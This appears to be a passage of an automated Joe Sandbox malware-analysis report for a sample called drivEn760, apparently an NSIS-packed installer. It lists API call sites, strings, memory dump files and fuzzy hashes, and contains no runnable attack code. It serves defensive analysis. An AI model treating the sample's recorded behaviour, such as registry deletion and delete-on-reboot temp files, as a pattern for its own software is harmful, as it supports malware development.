                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                            • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                                            • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                            • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404686
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                                            • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                                            • GetSysColor.USER32(?), ref: 004046B1
                                                                                                            • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                                            • DeleteObject.GDI32(?), ref: 004046DB
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                            • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                            • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                              • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                            • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                                            • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                            • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                                            • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                                            • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-1201062745
                                                                                                            • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                            • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                                            • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                                            • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                                                            • GetTickCount.KERNEL32 ref: 00403067
                                                                                                            • wsprintfW.USER32 ref: 00403095
                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,004030A8,004030A8,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000), ref: 00405725
                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\), ref: 00405737
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                                              • Part of subcall function 00403012: MulDiv.KERNEL32(0000BD48,00000064,0000DF35), ref: 00403027
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                                                            • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                                            • Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                                                                            • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                                            • GetMessagePos.USER32 ref: 00404FA2
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                            • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                            • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32(Delete on reboot: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32(Delete on reboot: ,00000000,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,?,00405701,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000), ref: 004068A4
                                                                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                            • String ID: MS Shell Dlg
                                                                                                            • API String ID: 2584051700-76309092
                                                                                                            • Opcode ID: 63458547509aebe2100064373ea1b811f2439a01b7a170ad2fb3bd0ca2265276
                                                                                                            • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                                            • Opcode Fuzzy Hash: 63458547509aebe2100064373ea1b811f2439a01b7a170ad2fb3bd0ca2265276
                                                                                                            • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                            • wsprintfW.USER32 ref: 00402FE5
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                            • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                                            • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                                            • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                                            APIs
                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 1354259210-0
                                                                                                            • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                                            • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                                            • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                                            • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                            • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
